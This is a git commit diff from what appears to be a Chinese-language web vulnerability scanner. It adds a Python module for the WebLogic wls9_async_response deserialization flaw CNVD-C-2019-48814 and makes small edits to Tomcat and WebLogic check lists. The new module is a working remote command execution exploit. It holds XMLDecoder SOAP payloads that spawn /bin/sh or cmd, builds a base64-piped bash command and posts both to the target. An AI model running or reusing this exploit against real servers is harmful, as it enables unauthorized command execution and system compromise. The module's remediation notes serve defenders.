Add CNVD-C-2019-48814

2019-04-26 19:52:06 +08:00
parent 8184b2adf4
commit d9e8bbf10e
5 changed files with 132 additions and 8 deletions
--- a/tomcat/Main_tomcat.py
+++ b/tomcat/Main_tomcat.py
@@ -7,9 +7,9 @@ import tomcat.tomcat_weakpasswd


 def exec(URL):
+    tomcat.example_vulnerability.attack(URL)
    tomcat.CVE_2017_12615.attack(URL)
    tomcat.CVE_2017_12617.attack(URL)
-    tomcat.example_vulnerability.attack(URL)
    tomcat.tomcat_weakpasswd.attack(URL)


--- a/tomcat/example_vulnerability.py
+++ b/tomcat/example_vulnerability.py
@@ -1,7 +1,5 @@
 # -*- coding: utf-8 -*-
-import sys
 import requests
-import time

 '''
 Usage:
@@ -21,10 +19,12 @@ def attack(URL):
        '/examples/servlets/servlet/SessionExample',  #200
        '/examples/',  #304
        '/docs/',  #304
+        '/docs/BUILDING.txt',
+        '/docs/RUNNING.txt',
        '/manager/html',  # 401
        '/host-manager/html',   #401
-		'/icons/',
-		'/manual/',
+        '/icons/',
+        '/manual/',
        '/examples/jsp/snp/snoop.jsp'
    )

@@ -50,5 +50,3 @@ def attack(URL):

 if __name__ == "__main__":
    attack()
-
-
--- a/weblogic/CNVD_C_2019_48814.py
+++ b/weblogic/CNVD_C_2019_48814.py
@@ -0,0 +1,124 @@
+# -*- coding: utf-8 -*-
+import optparse
+import requests
+import base64
+
+'''
+Usage:
+moon.py -u  weblogic http://127.0.0.1:7001
+这个脚本原始出处不知道哪位大神（py2），自己改了改（py3）。base64有个坑. bytes 和 str 转换python2和3有点区别。
+本脚本可直接执行命令。
+
+CNVD-C-2019-48814
+
+漏洞描述：
+WebLogic中默认包含的wls9_async_response包，为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意 HTTP 请求，获得目标服务器的权限，在未授权的情况下远程执行命令。
+
+影响范围：
+WebLogic 10.X
+WebLogic 12.1.3
+
+修复：
+打补丁
+ 1、删除该wls9_async_response.war包并重启webLogic：
+该war包具体路径如下：
+WebLogic 10.3.*：
+Middleware/wlserver_10.3/server/lib/bea_wls9_async_response.war
+WebLogic 12.1.3：
+Middleware/Oracle_Home/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war
+2、 通过访问策略控制禁止 /_async/* 路径的URL访问。
+
+# 参考：
+ttps://www.jianshu.com/p/c4982a845f55?utm_campaign=hugo&utm_medium=reader_share&utm_content=note&utm_source=weixin-timeline&from=timeline
+https://mp.weixin.qq.com/s/xJAP11xxGpR9CCVJ-SHeLw
+https://mp.weixin.qq.com/s?__biz=MzA4MDk3NzQ2OA==&mid=2454386939&idx=1&sn=2201c2986bba691c97833703ab38ee6a&chksm=882253a8bf55dabe9287d189b6eab43835fb5e11d573409818bd53c03449695da1299cdaaa7f&scene=0&xtrack=1&key=2b014a6820a1af4646355cdad083dd430a0a72940aaabd4c5d122740e2e70fe4311cf3b26341a5c67db5680b48dbb2cc9929bb2c752762eefc55cbbe9dce6687e4ab70f7680a5d816dfca875600660b6&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
+https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484258&idx=1&sn=f2213aec957aeb577c2d8f25bca2edd6&chksm=fa177fa1cd60f6b7634c1502b81a03c081827e9c3edb6151d75119433eafa91b080ce5549bf5&scene=0&xtrack=1&key=58a327fab9b03b4d45c412094df8e30eb0c8121282d89468600594c7b8c0bac551026570f083017558e66e639c43d0bad25d83481ed6e3122cf8f32c49b070a883b6f41e8b7f52597921748516633fe3&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
+
+'''
+
+headers = {'Content-type': 'text/xml'}
+uri = '/wls-wsat/CoordinatorPortType'
+linux_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">  
+<soapenv:Header> 
+<wsa:Action>demoAction</wsa:Action>
+<wsa:RelatesTo>hello</wsa:RelatesTo>
+<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
+<java version="1.8" class="java.beans.XMLDecoder"> 
+<void class="java.lang.ProcessBuilder"> 
+<array class="java.lang.String" length="3"> 
+<void index="0"> 
+<string>/bin/sh</string> 
+</void>
+<void index="1"> 
+<string>-c</string> 
+</void>
+<void index="2"> 
+<string>%s</string> 
+</void>
+</array>  
+<void method="start"/>
+</void> 
+</java> 
+</work:WorkContext> 
+</soapenv:Header>  
+<soapenv:Body>
+<asy:onAsyncDelivery/>
+</soapenv:Body> 
+</soapenv:Envelope>
+'''
+win_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">  
+<soapenv:Header> 
+<wsa:Action>demoAction</wsa:Action>
+<wsa:RelatesTo>hello</wsa:RelatesTo>
+<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
+<java version="1.8" class="java.beans.XMLDecoder"> 
+<void class="java.lang.ProcessBuilder"> 
+<array class="java.lang.String" length="3"> 
+<void index="0"> 
+<string>cmd</string> 
+</void>
+<void index="1"> 
+<string>/c</string> 
+</void>
+<void index="2"> 
+<string>%s</string> 
+</void>
+</array>  
+<void method="start"/>
+</void> 
+</java> 
+</work:WorkContext> 
+</soapenv:Header>  
+<soapenv:Body>
+<asy:onAsyncDelivery/>
+</soapenv:Body> 
+</soapenv:Envelope>
+'''
+
+
+def attack(URL):
+    print('[*]开始检测-Weblogic-CNVD-C-2019-48814。[*]')
+    cmd = str('whoami')
+    base64cmd=base64.b64encode(cmd.encode('utf-8'))
+    linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd.decode('utf-8')
+    linux_poc2 = linux_poc % linux_poccmd
+    win_poc2 = win_poc % cmd
+    url2 = URL + '/_async/AsyncResponseService'
+    try:
+        r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=7)
+        r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=7)
+        if r1.status_code == 202 or r2.status_code == 202:
+            print('[+]发现 CNVD-C-2019-48814!  请使用exp确认。')
+            print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
+            print('\n')
+    except requests.ReadTimeout:
+        print('[-]未发现 CNVD-C-2019-48814!   Read timeout')
+        print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
+        print('\n')
+    except Exception:
+        print('[-]未发现 CNVD-C-2019-48814!   some error')
+        print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
+        print('\n')
+
+if __name__ == '__main__':
+    attack()
--- a/weblogic/CVE_2018_2628.py
+++ b/weblogic/CVE_2018_2628.py
@@ -1,5 +1,5 @@
 # -*- coding: utf-8 -*-
-# Author:      xxlegend 
+# 原作者:xxlegend 
 import socket
 import time
 import re
--- a/weblogic/Main_weblogic.py
+++ b/weblogic/Main_weblogic.py
@@ -2,9 +2,11 @@
 import weblogic.CVE_2017_10271
 import weblogic.ssrf
 import weblogic.weblogic_weakpasswd
+import weblogic.CNVD_C_2019_48814
 import os

 def exec(URL):
+    weblogic.CNVD_C_2019_48814.attack(URL)
    weblogic.CVE_2017_10271.attack(URL)
    weblogic.ssrf.attack(URL)
    weblogic.weblogic_weakpasswd.attack(URL)